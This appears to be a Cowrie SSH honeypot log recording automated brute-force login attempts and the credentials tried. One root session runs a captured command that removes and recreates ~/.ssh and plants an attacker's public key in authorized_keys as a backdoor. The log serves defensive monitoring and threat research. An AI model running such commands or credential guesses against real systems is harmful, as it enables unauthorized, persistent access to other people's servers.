{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:38:25.749382Z","src_ip":"212.227.235.229","session":"df90c57cb517"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:38:26.278048Z","src_ip":"212.227.235.229","session":"df90c57cb517"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:38:26.400741Z","src_ip":"212.227.235.229","session":"414b69b88e56"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:38:26.401555Z","src_ip":"212.227.235.229","session":"df90c57cb517"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":42818,"dst_ip":"1.2.3.4","dst_port":22,"session":"0725b84fce33","protocol":"ssh","message":"New connection: 134.199.174.250:42818 (1.2.3.4:22) [session: 0725b84fce33]","sensor":"my-vps","timestamp":"2025-09-08T13:38:27.345713Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:38:27.346762Z","src_ip":"134.199.174.250","session":"0725b84fce33"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:38:27.663198Z","src_ip":"134.199.174.250","session":"0725b84fce33"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"1q2w3e4r","message":"login attempt [ftpuser/1q2w3e4r] failed","sensor":"my-vps","timestamp":"2025-09-08T13:38:28.656759Z","src_ip":"134.199.174.250","session":"0725b84fce33"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:38:30.057714Z","src_ip":"134.199.174.250","session":"0725b84fce33"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":17721,"dst_ip":"1.2.3.4","dst_port":22,"session":"f380d6abeaae","protocol":"ssh","message":"New connection: 49.247.35.31:17721 (1.2.3.4:22) [session: f380d6abeaae]","sensor":"my-vps","timestamp":"2025-09-08T13:38:43.818864Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:38:43.823452Z","src_ip":"49.247.35.31","session":"f380d6abeaae"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:38:44.103304Z","src_ip":"49.247.35.31","session":"f380d6abeaae"}
{"eventid":"cowrie.login.failed","username":"kafka","password":"!QAZ2wsx","message":"login attempt [kafka/!QAZ2wsx] failed","sensor":"my-vps","timestamp":"2025-09-08T13:38:45.175611Z","src_ip":"49.247.35.31","session":"f380d6abeaae"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:38:46.455888Z","src_ip":"49.247.35.31","session":"f380d6abeaae"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51230,"dst_ip":"1.2.3.4","dst_port":22,"session":"f128ae836379","protocol":"ssh","message":"New connection: 212.227.235.229:51230 (1.2.3.4:22) [session: f128ae836379]","sensor":"my-vps","timestamp":"2025-09-08T13:38:50.179445Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:38:50.180998Z","src_ip":"212.227.235.229","session":"f128ae836379"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:38:50.403964Z","src_ip":"212.227.235.229","session":"f128ae836379"}
{"eventid":"cowrie.login.success","username":"root","password":"Temp123","message":"login attempt [root/Temp123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:38:51.339315Z","src_ip":"212.227.235.229","session":"f128ae836379"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:38:51.830050Z","src_ip":"212.227.235.229","session":"f128ae836379"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:38:51.830896Z","src_ip":"212.227.235.229","session":"f128ae836379"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:38:51.831799Z","src_ip":"212.227.235.229","session":"f128ae836379"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:38:52.060405Z","src_ip":"212.227.235.229","session":"f128ae836379"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:38:52.559510Z","src_ip":"212.227.235.229","session":"f128ae836379"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:38:52.560342Z","src_ip":"212.227.235.229","session":"f128ae836379"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:38:52.791402Z","src_ip":"212.227.235.229","session":"f128ae836379"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:38:52.792323Z","src_ip":"212.227.235.229","session":"f128ae836379"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52262,"dst_ip":"1.2.3.4","dst_port":22,"session":"08b832731f20","protocol":"ssh","message":"New connection: 212.227.235.229:52262 (1.2.3.4:22) [session: 08b832731f20]","sensor":"my-vps","timestamp":"2025-09-08T13:38:53.016549Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:38:53.021035Z","src_ip":"212.227.235.229","session":"08b832731f20"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:38:53.247957Z","src_ip":"212.227.235.229","session":"08b832731f20"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:38:54.154208Z","src_ip":"212.227.235.229","session":"08b832731f20"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:38:55.382307Z","src_ip":"212.227.235.229","session":"08b832731f20"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52948,"dst_ip":"1.2.3.4","dst_port":22,"session":"86698dde0f17","protocol":"ssh","message":"New connection: 212.227.235.229:52948 (1.2.3.4:22) [session: 86698dde0f17]","sensor":"my-vps","timestamp":"2025-09-08T13:38:55.606031Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:38:55.607706Z","src_ip":"212.227.235.229","session":"86698dde0f17"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:38:55.831677Z","src_ip":"212.227.235.229","session":"86698dde0f17"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:38:56.741172Z","src_ip":"212.227.235.229","session":"86698dde0f17"}
{"eventid":"cowrie.session.closed","duration":"6.8","message":"Connection lost after 6.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:38:56.966628Z","src_ip":"212.227.235.229","session":"f128ae836379"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:38:56.967867Z","src_ip":"212.227.235.229","session":"86698dde0f17"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":59026,"dst_ip":"1.2.3.4","dst_port":22,"session":"063f62472141","protocol":"ssh","message":"New connection: 134.199.174.250:59026 (1.2.3.4:22) [session: 063f62472141]","sensor":"my-vps","timestamp":"2025-09-08T13:38:57.650561Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:38:57.651230Z","src_ip":"134.199.174.250","session":"063f62472141"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:38:57.956585Z","src_ip":"134.199.174.250","session":"063f62472141"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"pass123","message":"login attempt [ftpuser/pass123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:38:59.025349Z","src_ip":"134.199.174.250","session":"063f62472141"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:39:00.324113Z","src_ip":"134.199.174.250","session":"063f62472141"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55164,"dst_ip":"1.2.3.4","dst_port":22,"session":"b919b8d39e50","protocol":"ssh","message":"New connection: 212.227.235.229:55164 (1.2.3.4:22) [session: b919b8d39e50]","sensor":"my-vps","timestamp":"2025-09-08T13:39:19.774914Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:39:19.775835Z","src_ip":"212.227.235.229","session":"b919b8d39e50"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:39:19.877567Z","src_ip":"212.227.235.229","session":"b919b8d39e50"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"password1","message":"login attempt [hadoop/password1] failed","sensor":"my-vps","timestamp":"2025-09-08T13:39:20.347719Z","src_ip":"212.227.235.229","session":"b919b8d39e50"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:39:21.477320Z","src_ip":"212.227.235.229","session":"b919b8d39e50"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":38072,"dst_ip":"1.2.3.4","dst_port":22,"session":"7e3d464b766b","protocol":"ssh","message":"New connection: 134.199.174.250:38072 (1.2.3.4:22) [session: 7e3d464b766b]","sensor":"my-vps","timestamp":"2025-09-08T13:39:27.706651Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:39:27.707824Z","src_ip":"134.199.174.250","session":"7e3d464b766b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:39:28.042338Z","src_ip":"134.199.174.250","session":"7e3d464b766b"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"123abc","message":"login attempt [ftpuser/123abc] failed","sensor":"my-vps","timestamp":"2025-09-08T13:39:29.197096Z","src_ip":"134.199.174.250","session":"7e3d464b766b"}
